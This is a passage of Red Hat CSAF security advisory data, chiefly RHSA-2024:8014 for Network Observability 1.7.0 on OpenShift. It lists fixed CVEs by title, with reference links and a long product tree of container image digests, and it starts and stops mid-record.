"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "path-to-regexp: Backtracking regular expressions cause ReDoS", }, ], }
rhsa-2024_8014
Vulnerability from csaf_redhat
Published
2024-10-22 01:05
Modified
2024-12-18 04:39
Summary
Red Hat Security Advisory: Network Observability 1.7.0 for OpenShift
Notes
Topic
Network Observability 1.7 for Red Hat OpenShift
Red Hat Product Security has rated this update as having a security impact of
Important. A Common Vulnerability Scoring System (CVSS) base score, which gives
a detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Network Observability 1.7.0
Security Fix(es):
* Network Observability: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* Network Observability: XSS vulnerability via prototype pollution (CVE-2024-45801)
* Network Observability: axios: Server-Side Request Forgery (CVE-2024-39338)
* Network Observability: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* Network Observability: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* Network Observability: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* Network Observability: Improper Input Handling in Express Redirects (CVE-2024-43796)
* Network Observability: Improper Sanitization in serve-static (CVE-2024-43800)
* Network Observability: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)
* Network Observability: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)
* Network Observability: Calling Parse on a "// +build" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Network Observability 1.7 for Red Hat OpenShift\n\nRed Hat Product Security has rated this update as having a security impact of\nImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives\na detailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.", title: "Topic", }, { category: "general", text: "Network Observability 1.7.0\n\nSecurity Fix(es):\n\n* Network Observability: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* Network Observability: XSS vulnerability via prototype pollution (CVE-2024-45801)\n* Network Observability: axios: Server-Side Request Forgery (CVE-2024-39338)\n* Network Observability: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n* Network Observability: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n* Network Observability: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n* Network Observability: Improper Input Handling in Express Redirects (CVE-2024-43796)\n* Network Observability: Improper Sanitization in serve-static (CVE-2024-43800)\n* Network Observability: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)\n* Network Observability: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)\n* Network Observability: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:8014", url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2310527", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310527", }, { category: "external", summary: "2310528", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310528", }, { category: "external", summary: "2310529", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310529", }, { category: "external", summary: "2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "2312631", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312631", }, { category: "external", summary: "NETOBSERV-1377", url: "https://issues.redhat.com/browse/NETOBSERV-1377", }, { category: "external", summary: "NETOBSERV-1509", url: "https://issues.redhat.com/browse/NETOBSERV-1509", }, { category: "external", summary: "NETOBSERV-1538", url: "https://issues.redhat.com/browse/NETOBSERV-1538", }, { category: "external", summary: "NETOBSERV-1540", url: "https://issues.redhat.com/browse/NETOBSERV-1540", }, { category: "external", summary: "NETOBSERV-1564", url: "https://issues.redhat.com/browse/NETOBSERV-1564", }, { category: "external", summary: "NETOBSERV-163", url: "https://issues.redhat.com/browse/NETOBSERV-163", }, { category: "external", summary: "NETOBSERV-1666", url: "https://issues.redhat.com/browse/NETOBSERV-1666", }, { category: "external", summary: "NETOBSERV-1667", url: "https://issues.redhat.com/browse/NETOBSERV-1667", }, { category: "external", summary: "NETOBSERV-1733", url: "https://issues.redhat.com/browse/NETOBSERV-1733", }, { category: "external", summary: "NETOBSERV-1746", url: "https://issues.redhat.com/browse/NETOBSERV-1746", }, { category: "external", summary: "NETOBSERV-1748", url: "https://issues.redhat.com/browse/NETOBSERV-1748", }, { category: "external", summary: "NETOBSERV-1753", url: "https://issues.redhat.com/browse/NETOBSERV-1753", }, { category: "external", summary: "NETOBSERV-1766", url: "https://issues.redhat.com/browse/NETOBSERV-1766", }, { category: "external", summary: "NETOBSERV-1779", url: "https://issues.redhat.com/browse/NETOBSERV-1779", }, { category: "external", summary: "NETOBSERV-1783", url: "https://issues.redhat.com/browse/NETOBSERV-1783", }, { category: "external", summary: "NETOBSERV-1788", url: "https://issues.redhat.com/browse/NETOBSERV-1788", }, { category: "external", summary: "NETOBSERV-1798", url: "https://issues.redhat.com/browse/NETOBSERV-1798", }, { category: "external", summary: "NETOBSERV-1805", url: "https://issues.redhat.com/browse/NETOBSERV-1805", }, { category: "external", summary: "NETOBSERV-1806", url: "https://issues.redhat.com/browse/NETOBSERV-1806", }, { category: "external", summary: "NETOBSERV-1808", url: "https://issues.redhat.com/browse/NETOBSERV-1808", }, { category: "external", summary: "NETOBSERV-1811", url: "https://issues.redhat.com/browse/NETOBSERV-1811", }, { category: "external", summary: "NETOBSERV-1812", url: "https://issues.redhat.com/browse/NETOBSERV-1812", }, { category: "external", summary: "NETOBSERV-1813", url: "https://issues.redhat.com/browse/NETOBSERV-1813", }, { category: "external", summary: "NETOBSERV-1816", url: "https://issues.redhat.com/browse/NETOBSERV-1816", }, { category: "external", summary: "NETOBSERV-1819", url: "https://issues.redhat.com/browse/NETOBSERV-1819", }, { category: "external", summary: "NETOBSERV-1848", url: "https://issues.redhat.com/browse/NETOBSERV-1848", }, { category: "external", summary: "NETOBSERV-1884", url: "https://issues.redhat.com/browse/NETOBSERV-1884", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8014.json", }, ], title: "Red Hat Security Advisory: Network Observability 1.7.0 for OpenShift", tracking: { current_release_date: "2024-12-18T04:39:27+00:00", generator: { date: "2024-12-18T04:39:27+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.3", }, }, id: "RHSA-2024:8014", initial_release_date: "2024-10-22T01:05:39+00:00", revision_history: [ { date: "2024-10-22T01:05:39+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-22T01:05:39+00:00", number: "2", summary: "Last updated version", }, { date: "2024-12-18T04:39:27+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "NETOBSERV 1.7 for RHEL 9", product: { name: "NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0", product_identification_helper: { cpe: "cpe:/a:redhat:network_observ_optr:1.7.0::el9", }, }, }, ], category: "product_family", name: "Network Observability", }, { branches: [ { category: "product_version", name: "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", product: { name: "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", product_id: "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", product_identification_helper: { purl: "pkg:oci/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee?arch=amd64&repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", product: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", product_id: "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", product_identification_helper: { purl: "pkg:oci/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f?arch=amd64&repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", product: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", product_id: "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", product_identification_helper: { purl: "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056?arch=amd64&repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", product: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", product_id: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", product_identification_helper: { purl: "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45?arch=amd64&repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", product: { name: "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", product_id: "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", product_identification_helper: { purl: "pkg:oci/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1?arch=amd64&repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle&tag=1.7.0-86", }, }, }, { category: "product_version", name: "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", product: { name: "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", product_id: "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", product_identification_helper: { purl: "pkg:oci/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba?arch=amd64&repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator&tag=v1.7.0-67", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", product: { name: "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", product_id: "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", product_identification_helper: { purl: "pkg:oci/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d?arch=ppc64le&repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", product: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", product_id: "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", product_identification_helper: { purl: "pkg:oci/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86?arch=ppc64le&repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", product: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", product_id: "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", product_identification_helper: { purl: "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe?arch=ppc64le&repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", product: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", product_id: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", product_identification_helper: { purl: "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840?arch=ppc64le&repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", product: { name: "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", product_id: "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", product_identification_helper: { purl: "pkg:oci/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b?arch=ppc64le&repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle&tag=1.7.0-86", }, }, }, { category: "product_version", name: "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", product: { name: "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", product_id: "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", product_identification_helper: { purl: "pkg:oci/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a?arch=ppc64le&repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator&tag=v1.7.0-67", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", product: { name: "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", product_id: "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", product_identification_helper: { purl: "pkg:oci/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd?arch=arm64&repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", product: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", product_id: "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", product_identification_helper: { purl: "pkg:oci/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9?arch=arm64&repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", product: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", product_id: "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", product_identification_helper: { purl: "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf?arch=arm64&repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", product: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", product_id: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", product_identification_helper: { purl: "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844?arch=arm64&repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", product: { name: "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", product_id: "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", product_identification_helper: { purl: "pkg:oci/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe?arch=arm64&repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle&tag=1.7.0-86", }, }, }, { category: "product_version", name: "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", product: { name: "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", product_id: "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", product_identification_helper: { purl: "pkg:oci/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080?arch=arm64&repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator&tag=v1.7.0-67", }, }, }, ], category: "architecture", name: "arm64", }, { branches: [ { category: "product_version", name: "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", product: { name: "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", product_id: "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", product_identification_helper: { purl: "pkg:oci/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd?arch=s390x&repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", product: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", product_id: "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", product_identification_helper: { purl: "pkg:oci/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd?arch=s390x&repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", product: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", product_id: 